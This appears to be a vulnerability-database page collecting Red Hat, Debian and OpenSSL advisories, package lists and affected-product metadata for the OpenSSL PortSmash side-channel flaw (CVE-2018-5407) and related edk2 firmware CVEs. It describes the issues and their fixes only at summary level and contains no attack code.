https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash)
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.2k-16.el7_6.1.src.rpm
x86_64: openssl-1.0.2k-16.el7_6.1.x86_64.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm openssl-libs-1.0.2k-16.el7_6.1.i686.rpm openssl-libs-1.0.2k-16.el7_6.1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm openssl-devel-1.0.2k-16.el7_6.1.i686.rpm openssl-devel-1.0.2k-16.el7_6.1.x86_64.rpm openssl-perl-1.0.2k-16.el7_6.1.x86_64.rpm openssl-static-1.0.2k-16.el7_6.1.i686.rpm openssl-static-1.0.2k-16.el7_6.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.2k-16.el7_6.1.src.rpm
x86_64: openssl-1.0.2k-16.el7_6.1.x86_64.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm openssl-libs-1.0.2k-16.el7_6.1.i686.rpm openssl-libs-1.0.2k-16.el7_6.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm openssl-devel-1.0.2k-16.el7_6.1.i686.rpm openssl-devel-1.0.2k-16.el7_6.1.x86_64.rpm openssl-perl-1.0.2k-16.el7_6.1.x86_64.rpm openssl-static-1.0.2k-16.el7_6.1.i686.rpm openssl-static-1.0.2k-16.el7_6.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.2k-16.el7_6.1.src.rpm
ppc64: openssl-1.0.2k-16.el7_6.1.ppc64.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.ppc.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.ppc64.rpm openssl-devel-1.0.2k-16.el7_6.1.ppc.rpm openssl-devel-1.0.2k-16.el7_6.1.ppc64.rpm openssl-libs-1.0.2k-16.el7_6.1.ppc.rpm openssl-libs-1.0.2k-16.el7_6.1.ppc64.rpm
ppc64le: openssl-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-devel-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-libs-1.0.2k-16.el7_6.1.ppc64le.rpm
s390x: openssl-1.0.2k-16.el7_6.1.s390x.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.s390.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.s390x.rpm openssl-devel-1.0.2k-16.el7_6.1.s390.rpm openssl-devel-1.0.2k-16.el7_6.1.s390x.rpm openssl-libs-1.0.2k-16.el7_6.1.s390.rpm openssl-libs-1.0.2k-16.el7_6.1.s390x.rpm
x86_64: openssl-1.0.2k-16.el7_6.1.x86_64.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm openssl-devel-1.0.2k-16.el7_6.1.i686.rpm openssl-devel-1.0.2k-16.el7_6.1.x86_64.rpm openssl-libs-1.0.2k-16.el7_6.1.i686.rpm openssl-libs-1.0.2k-16.el7_6.1.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):
Source: openssl-1.0.2k-16.el7_6.1.src.rpm
aarch64: openssl-1.0.2k-16.el7_6.1.aarch64.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.aarch64.rpm openssl-devel-1.0.2k-16.el7_6.1.aarch64.rpm openssl-libs-1.0.2k-16.el7_6.1.aarch64.rpm
ppc64le: openssl-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-devel-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-libs-1.0.2k-16.el7_6.1.ppc64le.rpm
s390x: openssl-1.0.2k-16.el7_6.1.s390x.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.s390.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.s390x.rpm openssl-devel-1.0.2k-16.el7_6.1.s390.rpm openssl-devel-1.0.2k-16.el7_6.1.s390x.rpm openssl-libs-1.0.2k-16.el7_6.1.s390.rpm openssl-libs-1.0.2k-16.el7_6.1.s390x.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.2k-16.el7_6.1.ppc.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.ppc64.rpm openssl-perl-1.0.2k-16.el7_6.1.ppc64.rpm openssl-static-1.0.2k-16.el7_6.1.ppc.rpm openssl-static-1.0.2k-16.el7_6.1.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-perl-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-static-1.0.2k-16.el7_6.1.ppc64le.rpm
s390x: openssl-debuginfo-1.0.2k-16.el7_6.1.s390.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.s390x.rpm openssl-perl-1.0.2k-16.el7_6.1.s390x.rpm openssl-static-1.0.2k-16.el7_6.1.s390.rpm openssl-static-1.0.2k-16.el7_6.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm openssl-perl-1.0.2k-16.el7_6.1.x86_64.rpm openssl-static-1.0.2k-16.el7_6.1.i686.rpm openssl-static-1.0.2k-16.el7_6.1.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):
aarch64: openssl-debuginfo-1.0.2k-16.el7_6.1.aarch64.rpm openssl-perl-1.0.2k-16.el7_6.1.aarch64.rpm openssl-static-1.0.2k-16.el7_6.1.aarch64.rpm
ppc64le: openssl-debuginfo-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-perl-1.0.2k-16.el7_6.1.ppc64le.rpm openssl-static-1.0.2k-16.el7_6.1.ppc64le.rpm
s390x: openssl-debuginfo-1.0.2k-16.el7_6.1.s390.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.s390x.rpm openssl-perl-1.0.2k-16.el7_6.1.s390x.rpm openssl-static-1.0.2k-16.el7_6.1.s390.rpm openssl-static-1.0.2k-16.el7_6.1.s390x.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.2k-16.el7_6.1.src.rpm
x86_64: openssl-1.0.2k-16.el7_6.1.x86_64.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm openssl-devel-1.0.2k-16.el7_6.1.i686.rpm openssl-devel-1.0.2k-16.el7_6.1.x86_64.rpm openssl-libs-1.0.2k-16.el7_6.1.i686.rpm openssl-libs-1.0.2k-16.el7_6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.2k-16.el7_6.1.i686.rpm openssl-debuginfo-1.0.2k-16.el7_6.1.x86_64.rpm openssl-perl-1.0.2k-16.el7_6.1.x86_64.rpm openssl-static-1.0.2k-16.el7_6.1.i686.rpm openssl-static-1.0.2k-16.el7_6.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-5407 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXIj7zdzjgjWX9erEAQiieQ//TzEytTXxxzNqnsMz3yxbDgb1jni0dPYx 6If80sSKu32kPgoTUgTcoJ27jUIpupYHJj3ml1zhF0zTqMAd2fYXkl2/0HSzbX6z w7FKXiRuzoA8JNG+bbqNjLhwsJBP4Avqfi/S9Z/s/0v93ep54Aqo9pmxfZYJuUMQ GncD2JcidZXLm1sky4PFl59D94szXdRkkzS3xxYcp37dyAUxwqOyzDPwbDA4q3CO 4+TBL1hevmm5FSJjp/Bux70iEXubT+aGRM7Ab1Qex1h6rZjOfEgZabLOAJL9feGT mXPnML6DW96C4W9urZJZZcYJcZ34MfeH7TjaFKjfKeDIlb0fzdGuDqsrUXi95GjF atGtjkXsu5n2Nh3QQNvTRs5N+0w1PSp5VMlrQbeizE0FQVH60z6EUUGlcKEQglof Gs+pRtn7e9R/ncCNOrGAW0QbkmCGge3cg/kYlrJTt5dvQH1oSuG49ZqowG5It4vT kzIIDIhxrQrHE23eV7O1g48nV8/rPIZI6W2UuYs4sgQuWAtHx1gncWGXwiWRNtn1 38Iqnd+UBpxwBgb+fYYwZ54SOpLXGeUa1pR+ZV2+ToEmGM1yHQ+DMVKhRlAojKYa qwSvm7HPdu7ceUkW3HTOwU8llXOGmXJ0UIr+reqIJBemRg/24NeHZ20a9qMeybEX t5ytPgxAFC4=jvvo -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
For the stable distribution (stretch), these problems have been fixed in version 1.1.0j-1~deb9u1.
For the detailed security status of openssl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlwBuAcACgkQEMKTtsN8 TjZbBw/+MOB5+pZbCHHXyH3IeD+yj+tSPvmNc3SCwdEtUxGXr0ZX7TKHfaLs/8s6 Udto0K8a1FvjrcUQCfhnFpNcSAv9pxX13Fr6Pd560miIfAu9/5jAqiCufCoiz+xj 45LNJGlaxxaFjgBGCitZSJA0Fc4SM6v5XFyJfR3kChdQ/3kGQbbMNAp16Fy3ZsxJ VXwviomUxmmmdvjxyhifTIpuwr9OiJSQ+13etQjTDQ3pzSbLBPSOxmpV0vPIC7I2 Dwa4zuQXA/DF4G6l8T4rXCwCN4e4pwbTc8bbCjXeZK+iVAhnRD6wXlS3cc5IVAzx /qTa89LZU8B6ylcB6nodeAHLuZTC3Le8ndoxYz5S2/jHZMM/jCQNHYJemHWNbOqn q+e5W0D1fIVLiLoL/iHW5XhN6yJY2Ma7zjXMRBnkzJA9CTNIKgUjrSFz0Ud+wIM/ u8QhNPwZ0hPd5IfSgIyWqmuQ5XzFYqAQvwT1gUJiK7tIvuT0VsSyKVaSZVbi4yrM 9sxkZaP1UNLcTVCFw6A0KFwhb9z6kQtyH1MRkFPphmnb8jlHA3cTdPJkFUBi3VaT 7izThm5/mVLbAjZ8X7nkqnzWzmc885j0ml3slDd/MOVWB5CD3vFAcI8k3VZr3A61 P2gNSN6UbAbLMGsxgs3hYUHgazi7MdXJ/aNavjGSbYBNL780Iaw=3Qji -----END PGP SIGNATURE----- . Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. 7) - noarch
- Description:
OVMF (Open Virtual Machine Firmware) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.
Security Fix(es):
-
edk2: Privilege escalation via processing of malformed files in TianoCompress.c (CVE-2017-5731)
-
edk2: Privilege escalation via processing of malformed files in BaseUefiDecompressLib.c (CVE-2017-5732)
-
edk2: Privilege escalation via heap-based buffer overflow in MakeTable() function (CVE-2017-5733)
-
edk2: Privilege escalation via stack-based buffer overflow in MakeTable() function (CVE-2017-5734)
-
edk2: Privilege escalation via heap-based buffer overflow in Decode() function (CVE-2017-5735)
-
edk2: Logic error in MdeModulePkg in EDK II firmware allows for privilege escalation by authenticated users (CVE-2018-3613)
-
openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) (CVE-2018-5407)
-
edk2: Stack buffer overflow with corrupted BMP (CVE-2018-12181)
-
edk2: buffer overflows in PartitionDxe and UdfDxe with long file names and invalid UDF media (CVE-2019-0160)
-
edk2: stack overflow in XHCI causing denial of service (CVE-2019-0161)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):
1641433 - CVE-2018-3613 edk2: Logic error in MdeModulePkg in EDK II firmware allows for privilege escalation by authenticated users 1641442 - CVE-2017-5731 edk2: Privilege escalation via processing of malformed files in TianoCompress.c 1641446 - CVE-2017-5732 edk2: Privilege escalation via processing of malformed files in BaseUefiDecompressLib.c 1641450 - CVE-2017-5733 edk2: Privilege escalation via heap-based buffer overflow in MakeTable() function 1641458 - CVE-2017-5734 edk2: Privilege escalation via stack-based buffer overflow in MakeTable() function 1641465 - CVE-2017-5735 edk2: Privilege escalation via heap-based buffer overflow in Decode() function 1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) 1686783 - CVE-2018-12181 edk2: Stack buffer overflow with corrupted BMP 1691640 - CVE-2019-0160 edk2: buffer overflows in PartitionDxe and UdfDxe with long file names and invalid UDF media 1694065 - CVE-2019-0161 edk2: stack overflow in XHCI causing denial of service
6. OpenSSL Security Advisory [12 November 2018]
Microarchitecture timing vulnerability in ECC scalar multiplication (CVE-2018-5407)
Severity: Low
OpenSSL ECC scalar multiplication, used in e.g. ECDSA and ECDH, has been shown to be vulnerable to a microarchitecture timing side channel attack. An attacker with sufficient access to mount local timing attacks during ECDSA signature generation could recover the private key.
This issue does not impact OpenSSL 1.1.1 and is already fixed in the latest version of OpenSSL 1.1.0 (1.1.0i). OpenSSL 1.0.2 is affected but due to the low severity of this issue we are not creating a new release at this time. The 1.0.2 mitigation for this issue can be found in commit b18162a7c.
OpenSSL 1.1.0 users should upgrade to 1.1.0i.
This issue was reported to OpenSSL on 26th October 2018 by Alejandro Cabrera Aldaya, Billy Brumley, Sohaib ul Hassan, Cesar Pereida Garcia and Nicola Tuveri.
Note
OpenSSL 1.1.0 is currently only receiving security updates. Support for this version will end on 11th September 2019. Users of this version should upgrade to OpenSSL 1.1.1.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20181112.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201811-0912", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.0.1" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.3.3" }, { "model": "application server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.0.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "18.8" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.2q" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "17.7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "mysql enterprise backup", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "3.12.3" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "10.0.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.1.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "15.1" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "6.14.4" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.0.5.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "tuxedo", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.1.0.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "16.1" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "16.2" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "17.12" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.10" }, { "model": "nessus", "scope": "lt", "trust": 1.0, "vendor": "tenable", "version": "8.1.1" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "8.0.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.57" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.55" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.2.0.0.0" }, { "model": "mysql enterprise backup", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "4.1.2" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "15.2" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "10.9.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.4" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "application server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "0.9.8" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.04" }, { "model": "mysql enterprise backup", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "3.12.4" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "8.11.4" }, { "model": "vm virtualbox", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "6.0.0" }, { "model": "api gateway", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.3.0.0.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.1.0i" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.56" } ], "sources": [ { "db": "NVD", "id": "CVE-2018-5407" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.9.0", "versionStartIncluding": "10.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.11.4", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.14.4", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.2q", "versionStartIncluding": "1.0.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.1.0i", "versionStartIncluding": "1.1.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.1.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "17.12", "versionStartIncluding": "17.7", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:tuxedo:12.1.1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:application_server:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:application_server:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:application_server:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql_enterprise_backup:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "3.12.3", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql_enterprise_backup:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.1.2", "versionStartIncluding": "3.12.4", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2018-5407" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "152240" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "152071" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153887" }, { "db": "PACKETSTORM", "id": "152241" } ], "trust": 0.7 }, "cve": "CVE-2018-5407", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": 